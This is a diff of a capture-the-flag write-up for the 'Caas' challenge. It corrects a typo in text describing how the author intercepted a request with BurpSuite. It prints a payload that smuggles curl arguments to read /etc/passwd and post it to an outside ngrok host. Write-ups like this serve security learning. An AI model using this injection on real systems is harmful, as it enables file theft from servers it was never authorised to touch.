Ch3lLIST4/CTF-Writeups-2021/Cyber-Apocalypse-2021/chals/Caas.md

 To bypass the `trycatch` used in the front-end JavaScript file, I simply used BurpSuite to intercept and modify the request

-I used this payload to test the file retrieval on `/etc/passwd` and it workded
+I used this payload to test the file retrieval on `/etc/passwd` and it worked

 ```
 -F password=@/etc/passwd http://521cc97681d2.ngrok.io/shell.php